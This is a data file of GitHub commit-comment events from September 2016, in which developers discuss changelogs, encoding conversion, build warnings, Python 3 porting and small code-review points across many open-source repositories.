{"id":"4579550929","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069966,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T08:52:31Z","updated_at":"2016-09-18T08:52:31Z","body":"no, not every commit goes to the changle log"}},"created_at":"2016-09-18T08:52:31Z"}
{"id":"4579552841","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069968,"position":91,"line":91,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T08:54:00Z","updated_at":"2016-09-18T08:54:00Z","body":"What encoding does `else` branch handle?"}},"created_at":"2016-09-18T08:54:00Z"}
{"id":"4579552940","type":"CommitCommentEvent","actor":{"login":"stonered1"},"repo":{"name":"stonered1/ActionBar1"},"payload":{"comment":{"id":19069969,"position":null,"line":null,"path":null,"commit_id":"051378f2eff7ea8879b4bbedd4398145a009c4f1","created_at":"2016-09-18T08:54:05Z","updated_at":"2016-09-18T08:54:05Z","body":"wqdeaq"}},"created_at":"2016-09-18T08:54:05Z"}
{"id":"4579553223","type":"CommitCommentEvent","actor":{"login":"McLoy"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19069970,"position":null,"line":null,"path":null,"commit_id":"5d4cb465d0da1249c3e5cd87265060e3f1f838ca","created_at":"2016-09-18T08:54:16Z","updated_at":"2016-09-18T08:54:16Z","body":"Спасибо...старался) "}},"created_at":"2016-09-18T08:54:16Z"}
{"id":"4579554710","type":"CommitCommentEvent","actor":{"login":"lucasmichot"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069971,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T08:55:17Z","updated_at":"2016-09-18T08:55:17Z","body":"But every merged pr does, therefore the idea to use this tool\n\nLe 18 septembre 2016 à 10:52:35, Graham Campbell (notifications@github.com)\na écrit:\n\n> no, not every commit goes to the changle log\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/laravel/framework/commit/b5bfac08209462ad49a91ef2d21fb34e6b39233a#commitcomment-19069966>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAfWQ8_MJEECE_eujoywt2hq61TKomMkks5qrPvTgaJpZM4J5qWn>\n> .\n>\n"}},"created_at":"2016-09-18T08:55:17Z"}
{"id":"4579555340","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069972,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T08:55:43Z","updated_at":"2016-09-18T08:55:43Z","body":"@lotem string也能直接比較啊，很簡潔。這個map沒有用過，算函數式編程？"}},"created_at":"2016-09-18T08:55:43Z"}
{"id":"4579556475","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19069973,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-18T08:56:37Z","updated_at":"2016-09-18T08:56:37Z","body":"Ok, I understand. "}},"created_at":"2016-09-18T08:56:37Z"}
{"id":"4579556671","type":"CommitCommentEvent","actor":{"login":"Moritoh-ruby"},"repo":{"name":"minimaru/team_project"},"payload":{"comment":{"id":19069974,"position":null,"line":null,"path":null,"commit_id":"43a64fd473d112aca0ee3b0aef4c6d0f40936644","created_at":"2016-09-18T08:56:45Z","updated_at":"2016-09-18T08:56:45Z","body":"お疲れ様でした"}},"created_at":"2016-09-18T08:56:45Z"}
{"id":"4579563271","type":"CommitCommentEvent","actor":{"login":"frontensis"},"repo":{"name":"frontensis/myRepo"},"payload":{"comment":{"id":19069979,"position":4,"line":11,"path":"index.html","commit_id":"7742194da95e13d05c6a3aabe3771b15bcbc7b41","created_at":"2016-09-18T09:01:05Z","updated_at":"2016-09-18T09:01:05Z","body":"hoho "}},"created_at":"2016-09-18T09:01:05Z"}
{"id":"4579564586","type":"CommitCommentEvent","actor":{"login":"YOUYOUYOU"},"repo":{"name":"YOUYOUYOU/helloworld"},"payload":{"comment":{"id":19069982,"position":null,"line":null,"path":null,"commit_id":"9f0fdd5c3a9a8c601b776ae8c4fe906144058c42","created_at":"2016-09-18T09:01:58Z","updated_at":"2016-09-18T09:01:58Z","body":"d different"}},"created_at":"2016-09-18T09:01:58Z"}
{"id":"4579564702","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069984,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T09:02:03Z","updated_at":"2016-09-18T09:02:03Z","body":"Not every merged pr either."}},"created_at":"2016-09-18T09:02:03Z"}
{"id":"4579565164","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069985,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T09:02:20Z","updated_at":"2016-09-18T09:02:20Z","body":"If i happen to fix some phpdoc by sending a pr, we don't want that in the changelog."}},"created_at":"2016-09-18T09:02:20Z"}
{"id":"4579566367","type":"CommitCommentEvent","actor":{"login":"yasirramadan"},"repo":{"name":"yasirramadan/Test1"},"payload":{"comment":{"id":19069988,"position":null,"line":null,"path":null,"commit_id":"913c423bd4c7705ed794ff1792448bb9155c932a","created_at":"2016-09-18T09:03:13Z","updated_at":"2016-09-18T09:03:13Z","body":"bv"}},"created_at":"2016-09-18T09:03:13Z"}
{"id":"4579566825","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069989,"position":91,"line":91,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T09:03:30Z","updated_at":"2016-09-18T09:03:30Z","body":"所有其他libiconv支持的，比如utf-16、gbk、big5之類的。"}},"created_at":"2016-09-18T09:03:30Z"}
{"id":"4579572410","type":"CommitCommentEvent","actor":{"login":"lucasmichot"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19069996,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T09:06:49Z","updated_at":"2016-09-18T09:06:49Z","body":"Only PR with changelog specific comments are taken in considération\n\n\nLe 18 septembre 2016 à 11:02:24, Graham Campbell (notifications@github.com)\na écrit:\n\n> If i happen to fix some phpdoc by sending a pr, we don't want that in the\n> changelog.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/laravel/framework/commit/b5bfac08209462ad49a91ef2d21fb34e6b39233a#commitcomment-19069985>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAfWQ7ejgMGPfDKuTYTj5xla45TwBxgSks5qrP4ggaJpZM4J5qWn>\n> .\n>\n"}},"created_at":"2016-09-18T09:06:49Z"}
{"id":"4579574365","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19069998,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T09:08:07Z","updated_at":"2016-09-18T09:08:07Z","body":"@ndmitchell the warning is there to point out a potential problem, whether it is a problem needs to be judged :-) Just like `hlint` warnings, not all warnings need to be acted upon"}},"created_at":"2016-09-18T09:08:07Z"}
{"id":"4579575509","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19069999,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-18T09:08:52Z","updated_at":"2016-09-18T09:08:52Z","body":"I understand that qgis core plugin should be converted to python 3 ASAP. Just ?\r\n@volaya : difficult to backport to master_2 after that."}},"created_at":"2016-09-18T09:08:52Z"}
{"id":"4579575952","type":"CommitCommentEvent","actor":{"login":"ndmitchell"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19070001,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T09:09:09Z","updated_at":"2016-09-18T09:09:09Z","body":"What would you recommend? Ignoring just this one warning? I am happy to take your advice here. "}},"created_at":"2016-09-18T09:09:09Z"}
{"id":"4579577093","type":"CommitCommentEvent","actor":{"login":"eligao"},"repo":{"name":"eligao/python-telegram-bot"},"payload":{"comment":{"id":19070002,"position":null,"line":null,"path":null,"commit_id":"aa5270b882b06bcec4ba470f8fb2490727dfc9d4","created_at":"2016-09-18T09:09:55Z","updated_at":"2016-09-18T09:09:55Z","body":"Assume we got a command with more than one continuous white-space characters (which does happen) :\r\n\r\n> /func[space][space]arg1[space]arg2[space][space]arg3[space][space][space]arg4\r\n\r\nafter `split(' ')`, we have\r\n`['/func', '', 'arg1', 'arg2', '', 'arg3', '', '', 'arg4']`\r\nwhich includes many unnecessary empty strings that leads to improper command handling.\r\nThis is also different from how the system handles standard `argv[]`.\r\nHowever with `split()`, we have the proper parameters:\r\n`['/func', 'arg1', 'arg2', 'arg3',  'arg4']`\r\nAlso it eliminates other unnecessary white-spaces like `\\r`,`\\n`, etc."}},"created_at":"2016-09-18T09:09:55Z"}
{"id":"4579577291","type":"CommitCommentEvent","actor":{"login":"hintjens"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19070003,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-18T09:10:05Z","updated_at":"2016-09-18T09:10:05Z","body":"Feel free to change the code as you like, and send the usual PRs. :-)\n\nI'm too distracted with other issues to look at this, and pretty soon won't\nbe around to merge PRs either. Do you want to become an admin of the Guide\nproject?\n\nOn Sun, Sep 18, 2016 at 10:44 AM, Patrik Wenger <notifications@github.com>\nwrote:\n\n> Ah okay, that makes sense. So if it's definitely all zeroes, why test for\n> the presence of the frames? That condition is never going to be true, as\n> far as I can tell.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/booksbyus/zguide/commit/fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed#commitcomment-19069956>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASzCHNja9q4f75jAP8ksuI87ImlpWYgks5qrPoGgaJpZM4J_sVY>\n> .\n>\n"}},"created_at":"2016-09-18T09:10:05Z"}
{"id":"4579577349","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19070004,"position":91,"line":91,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T09:10:08Z","updated_at":"2016-09-18T09:10:08Z","body":"Better comment in code; or if you put each case in a separate named function, it'll be self-explaining."}},"created_at":"2016-09-18T09:10:08Z"}
{"id":"4579578847","type":"CommitCommentEvent","actor":{"login":"jcansdale"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19070006,"position":181,"line":32,"path":"src/BenchmarkDotNet.Core/Jobs/JobExtensions.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-18T09:11:02Z","updated_at":"2016-09-18T09:11:02Z","body":"It's a shame C# doesn't have units of measure. :smile: Is the idea to have a nanosecond based equivalent to TimeSpan? This reads well enough, but mirroring TimeSpan with `TimeInterval.FromMilliseconds(200)` might make it a little more discoverable.\r\n\r\nI'd be inclined to keep an (int milliseconds) overload since this seems to be a common pattern in .NET (with `Thread.Sleep` and `Task.Delay` both having it). It's also a breaking change for anyone who has defined their own `IConfig`."}},"created_at":"2016-09-18T09:11:02Z"}
{"id":"4579582447","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19070012,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-18T09:13:26Z","updated_at":"2016-09-18T09:13:26Z","body":"All things considered, using a newer `filepath` on pre-new-build cabals requires explicit sandboxing (which coincidentally became available with 1.18), so I don't think it's a real issue for `filepath`... :-)\r\n\r\nAnd long-term, there will be pressure to use recent cabal-install 2.0+ with `new-build` hopefully becoming the default soon (aka cabal-install 3.0+) to make the most out of hackage anyway. IOW, we're moving away from coupling cabal versions to GHC releases."}},"created_at":"2016-09-18T09:13:26Z"}
{"id":"4579582827","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"btoueg/LCM-object-viewer"},"payload":{"comment":{"id":19070014,"position":null,"line":null,"path":null,"commit_id":"f5cb048f130d6c6d75c338c98a7120e3d7f4f778","created_at":"2016-09-18T09:13:43Z","updated_at":"2016-09-18T09:13:43Z","body":"Hello Tan,\r\n\r\nI can't help about Dragon and Donjon but you can find more info here: http://www.polymtl.ca/nucleaire/en/logiciels/index.php"}},"created_at":"2016-09-18T09:13:43Z"}
{"id":"4579583246","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070015,"position":69,"line":195,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T09:13:57Z","updated_at":"2016-09-18T09:13:57Z","body":"fling velocity tweak exists on XOS, I added it!!!!!!"}},"created_at":"2016-09-18T09:13:57Z"}
{"id":"4579583584","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070016,"position":58,"line":184,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T09:14:10Z","updated_at":"2016-09-18T09:14:10Z","body":"Does it matter?"}},"created_at":"2016-09-18T09:14:10Z"}
{"id":"4579584040","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070018,"position":18,"line":137,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T09:14:30Z","updated_at":"2016-09-18T09:14:30Z","body":"And did it break something?"}},"created_at":"2016-09-18T09:14:30Z"}
{"id":"4579584336","type":"CommitCommentEvent","actor":{"login":"AkosuaK-A"},"repo":{"name":"AkosuaK-A/Datascience-Coursera"},"payload":{"comment":{"id":19070019,"position":null,"line":null,"path":null,"commit_id":"bd48fe596b2ed19f9c2b8a0657a646464828a1a2","created_at":"2016-09-18T09:14:44Z","updated_at":"2016-09-18T09:14:44Z","body":"This is a markdown file"}},"created_at":"2016-09-18T09:14:44Z"}
{"id":"4579584738","type":"CommitCommentEvent","actor":{"login":"miloyip"},"repo":{"name":"miloyip/json-tutorial"},"payload":{"comment":{"id":19070020,"position":72,"line":354,"path":"tutorial01/tutorial01.md","commit_id":"50d8a6b7c7ea663180a7268555a9b7edc1326f88","created_at":"2016-09-18T09:15:02Z","updated_at":"2016-09-18T09:15:02Z","body":"Yes"}},"created_at":"2016-09-18T09:15:02Z"}
{"id":"4579585583","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19070021,"position":9,"line":24092,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/rules/de/grammar.xml","commit_id":"903d6e0c4fc7a2cac578a69801db6cd592863cc1","created_at":"2016-09-18T09:15:37Z","updated_at":"2016-09-18T09:15:37Z","body":"I think we should change the text to \"Die vom Duden empfohlene Schreibweise ...\""}},"created_at":"2016-09-18T09:15:37Z"}
{"id":"4579587500","type":"CommitCommentEvent","actor":{"login":"Hambrook"},"repo":{"name":"Hambrook/Syn"},"payload":{"comment":{"id":19070024,"position":null,"line":null,"path":null,"commit_id":"1564a2002257c3f1bd3d8f3e139355b179773270","created_at":"2016-09-18T09:16:56Z","updated_at":"2016-09-18T09:16:56Z","body":"Closes #6"}},"created_at":"2016-09-18T09:16:56Z"}
{"id":"4579587646","type":"CommitCommentEvent","actor":{"login":"zhou12315"},"repo":{"name":"zhou12315/zhou-test"},"payload":{"comment":{"id":19070025,"position":null,"line":null,"path":null,"commit_id":"f3ede484c5e644515825161bb915eb15254ee023","created_at":"2016-09-18T09:17:03Z","updated_at":"2016-09-18T09:17:03Z","body":"this ok"}},"created_at":"2016-09-18T09:17:03Z"}
{"id":"4579590301","type":"CommitCommentEvent","actor":{"login":"nitmir"},"repo":{"name":"vauxia/django-cas-server"},"payload":{"comment":{"id":19070027,"position":51,"line":326,"path":"cas_server/auth.py","commit_id":"d3e7328348cf91cf399a54061581b4b355bac58a","created_at":"2016-09-18T09:18:52Z","updated_at":"2016-09-18T09:18:52Z","body":"You should store the connection in a variable like `conn` and call `conn.unbind()` to close the connection then you connect successfully. Otherwise, each time a user successfully authenticate, you let the connection to the database open. If you have a lots of users, this may become a problem (\"memory leak\" python side,  reach max concurrent connextions on ldap side)"}},"created_at":"2016-09-18T09:18:52Z"}
{"id":"4579591446","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19070028,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T09:19:45Z","updated_at":"2016-09-18T09:19:45Z","body":"@osfans 與 Java 不同，C++ 的 `std::string` 類重載了 `==` 等運算符。C++ 對象多用「值」語義，所以比較的是值而非引用。\r\n\r\n這裏其實是個函數表，簡單地用函數指針就行。或者用更厲害的 `std::function`。\r\n整個數據結構類似這樣：\r\n`map<string /*encoding*/, function<string /*converted text*/ (const string& query)>>`\r\n單用 C 也能實現：\r\n```\r\nstruct {\r\n  const char* encoding;\r\n  char* (*convert)(const char*);\r\n} converters[] = {\r\n   {\"utf\", &convert_utf},\r\n   {\"codepoint\", &convert_utf},\r\n   ...\r\n};\r\n```"}},"created_at":"2016-09-18T09:19:45Z"}
{"id":"4579591801","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19070029,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-18T09:20:04Z","updated_at":"2016-09-18T09:20:04Z","body":"Yeah... Backporting is a nightmare with all the changes and different branches, we're all suffering because of that. But working toward 3.0 should be our #1 priority now."}},"created_at":"2016-09-18T09:20:04Z"}
{"id":"4579592039","type":"CommitCommentEvent","actor":{"login":"myarichuk"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19070031,"position":5,"line":25,"path":"tools/TypingsGenerator/Program.cs","commit_id":"a92493e5ed5ff12043df165bfba50e5f739fc523","created_at":"2016-09-18T09:20:12Z","updated_at":"2016-09-18T09:20:12Z","body":"hmm.. forgot to remove the comments I think. If I am not mistaken, they were failing to compile for some reason shortly after update to visual studio or something similar. "}},"created_at":"2016-09-18T09:20:12Z"}
{"id":"4579592414","type":"CommitCommentEvent","actor":{"login":"myarichuk"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19070032,"position":5,"line":25,"path":"tools/TypingsGenerator/Program.cs","commit_id":"a92493e5ed5ff12043df165bfba50e5f739fc523","created_at":"2016-09-18T09:20:27Z","updated_at":"2016-09-18T09:20:27Z","body":"I will remove the comments"}},"created_at":"2016-09-18T09:20:27Z"}
{"id":"4579594213","type":"CommitCommentEvent","actor":{"login":"Nicke535"},"repo":{"name":"ineentho/textspel"},"payload":{"comment":{"id":19070034,"position":null,"line":null,"path":null,"commit_id":"306d5ceeb19e58e3e18ddb0953cd32f4fdfa5c62","created_at":"2016-09-18T09:21:48Z","updated_at":"2016-09-18T09:21:48Z","body":"Trinket's prefixer är något svagare (de saknar de starkaste prefixarna). Men ja, något måste göras åt allt detta kopierande."}},"created_at":"2016-09-18T09:21:48Z"}
{"id":"4579594939","type":"CommitCommentEvent","actor":{"login":"sanyaches"},"repo":{"name":"sanyaches/rep-sanyaches"},"payload":{"comment":{"id":19070035,"position":null,"line":null,"path":null,"commit_id":"9c49d388b33fe0252830882e9aa31044cfbed4cc","created_at":"2016-09-18T09:22:15Z","updated_at":"2016-09-18T09:22:15Z","body":"во даёт пацан"}},"created_at":"2016-09-18T09:22:15Z"}
{"id":"4579598276","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19070038,"position":null,"line":null,"path":null,"commit_id":"8cd3e1e2bac5d7b8d3ae84a91f1019007f82c483","created_at":"2016-09-18T09:24:40Z","updated_at":"2016-09-18T09:24:40Z","body":"This broke the darwin build"}},"created_at":"2016-09-18T09:24:40Z"}
{"id":"4579598462","type":"CommitCommentEvent","actor":{"login":"zzcode"},"repo":{"name":"zzcode/hessian_client"},"payload":{"comment":{"id":19070039,"position":null,"line":null,"path":null,"commit_id":"98a770a3173a3f38cfddf73fc73c07377c12b848","created_at":"2016-09-18T09:24:48Z","updated_at":"2016-09-18T09:24:48Z","body":"hessian client demo"}},"created_at":"2016-09-18T09:24:48Z"}
{"id":"4579598594","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19070040,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-18T09:24:53Z","updated_at":"2016-09-18T09:24:53Z","body":"not directly related to that - but on starting E2 one Error/Information still exists - not sure if we should simply ignore that:\r\n\r\n10:20:09.4638 { E } /usr/lib/python2.7/warnings.py:33 _show_warning :0: UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'.  Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied.  Without the service_identity module and a recent enough pyOpenSSL to support it, Twisted can perform only rudimentary TLS client hostname verification.  Many valid certificate/hostname mappings may be rejected."}},"created_at":"2016-09-18T09:24:53Z"}
{"id":"4579602887","type":"CommitCommentEvent","actor":{"login":"nigelcharman"},"repo":{"name":"DevOpsEventsNZ/devopsdays-web"},"payload":{"comment":{"id":19070046,"position":null,"line":null,"path":null,"commit_id":"f855a7ff39fbf89f24cbe5366dae5854c7ea6f37","created_at":"2016-09-18T09:28:12Z","updated_at":"2016-09-18T09:28:12Z","body":"LGTM. I'm happy to publish as - is. There's a couple of TBC's including Lindsay's presentation title, that might take a few days to sort out and can be done as a separate PR. "}},"created_at":"2016-09-18T09:28:12Z"}
{"id":"4579603288","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19070049,"position":91,"line":91,"path":"src/gear/codepoint_translator.cc","commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T09:28:32Z","updated_at":"2016-09-18T09:28:32Z","body":"其實是統一用了try catch，在轉換錯誤時，不返回候選。\r\n分拆成函數之後，每一個都要檢查是否有編碼錯誤了？"}},"created_at":"2016-09-18T09:28:32Z"}
{"id":"4579603401","type":"CommitCommentEvent","actor":{"login":"jwatzman"},"repo":{"name":"kkos/oniguruma"},"payload":{"comment":{"id":19070050,"position":4,"line":740,"path":"src/oniguruma.h","commit_id":"f5fe5a3b475999842578477f12048da8a5baea09","created_at":"2016-09-18T09:28:38Z","updated_at":"2016-09-18T09:28:38Z","body":"I think these also want to be `OnigUChar` :)"}},"created_at":"2016-09-18T09:28:38Z"}
{"id":"4579604778","type":"CommitCommentEvent","actor":{"login":"VariantXYZ"},"repo":{"name":"PolarisTeam/PolarisServer"},"payload":{"comment":{"id":19070054,"position":null,"line":null,"path":null,"commit_id":"8a627b9f00135d93b8f5f96d6b1ddd619eb8f8be","created_at":"2016-09-18T09:29:40Z","updated_at":"2016-09-18T09:29:40Z","body":"wtf"}},"created_at":"2016-09-18T09:29:40Z"}
{"id":"4579606729","type":"CommitCommentEvent","actor":{"login":"HibernatingRhinosServiceAccount"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19070056,"position":5,"line":25,"path":"tools/TypingsGenerator/Program.cs","commit_id":"a92493e5ed5ff12043df165bfba50e5f739fc523","created_at":"2016-09-18T09:30:54Z","updated_at":"2016-09-18T09:30:54Z","body":"Ok, I thought it was some issues with compilation etc.\n\nThanks!\n\nMarcin\n\nOn Sun, Sep 18, 2016 at 11:20 AM Michael Yarichuk <notifications@github.com>\nwrote:\n\n> I will remove the comments\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ayende/ravendb/commit/a92493e5ed5ff12043df165bfba50e5f739fc523#commitcomment-19070032>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB4wAIoDqvyGlhRVjLqXalchfbH--OgPks5qrQJbgaJpZM4J-4T1>\n> .\n>\n"}},"created_at":"2016-09-18T09:30:54Z"}
{"id":"4579608377","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070058,"position":69,"line":195,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T09:32:10Z","updated_at":"2016-09-18T09:32:10Z","body":"I mean jpeg tweaks, not velocity."}},"created_at":"2016-09-18T09:32:10Z"}
{"id":"4579609085","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19070060,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-18T09:32:42Z","updated_at":"2016-09-18T09:32:42Z","body":"https://github.com/sherpya/meta-sherpya/blob/master/recipes-devtools/python/python-service-identity_16.0.0.bb there is a bb we might use"}},"created_at":"2016-09-18T09:32:42Z"}
{"id":"4579611534","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19070064,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-18T09:34:22Z","updated_at":"2016-09-18T09:34:22Z","body":"@SOF3 I like your style :laughing:"}},"created_at":"2016-09-18T09:34:22Z"}
{"id":"4579613180","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19070066,"position":null,"line":null,"path":null,"commit_id":"e596dae327b445718022689926174307616b3d91","created_at":"2016-09-18T09:35:32Z","updated_at":"2016-09-18T09:35:32Z","body":"Curious. Why do we need this method?"}},"created_at":"2016-09-18T09:35:32Z"}
{"id":"4579613220","type":"CommitCommentEvent","actor":{"login":"honzajavorek"},"repo":{"name":"pyvec/cz.pycon.org-2016"},"payload":{"comment":{"id":19070067,"position":null,"line":null,"path":null,"commit_id":"c8e2610dda724d690faa98402f697011eac93a2b","created_at":"2016-09-18T09:35:34Z","updated_at":"2016-09-18T09:35:34Z","body":"💕 "}},"created_at":"2016-09-18T09:35:34Z"}
{"id":"4579614139","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"vofus/training_final-task"},"payload":{"comment":{"id":19070071,"position":26,"line":46,"path":"app/core/dataStore.factory.js","commit_id":"409391b26130aced403c1fe5269d98f8c968c36c","created_at":"2016-09-18T09:36:16Z","updated_at":"2016-09-18T09:36:16Z","body":"Т.к. это используется больше, чем один раз, есть смысл вынести в отдельный метод (создать, например, сервис с утилитами) и использовать его для формирования массива из объекта."}},"created_at":"2016-09-18T09:36:16Z"}
{"id":"4579614280","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19070072,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-18T09:36:24Z","updated_at":"2016-09-18T09:36:24Z","body":"I still feel inexperienced in C, but I can try.\r\n\r\nAnd I'm sorry to hear about that. I could but I haven't even read 100% of it. If it's about accepting PRs, and maybe eventually adapting it for the more recent CZMQ API (like zactor instead of zthread), then sure. "}},"created_at":"2016-09-18T09:36:24Z"}
{"id":"4579615988","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19070077,"position":69,"line":195,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T09:37:50Z","updated_at":"2016-09-18T09:37:50Z","body":"I know that many of these don't even work but let them stay here maybe some of them really work."}},"created_at":"2016-09-18T09:37:50Z"}
{"id":"4579616160","type":"CommitCommentEvent","actor":{"login":"jayanthbabu"},"repo":{"name":"foxandy/Clustering_MapReduceJava"},"payload":{"comment":{"id":19070078,"position":null,"line":null,"path":null,"commit_id":"c6a530f9720c2e59d146d963e6b3369a9eff6f9e","created_at":"2016-09-18T09:37:59Z","updated_at":"2016-09-18T09:37:59Z","body":"How to compile compile it in the hadoop single node system..include the procedure in the readme file.\r\n "}},"created_at":"2016-09-18T09:37:59Z"}
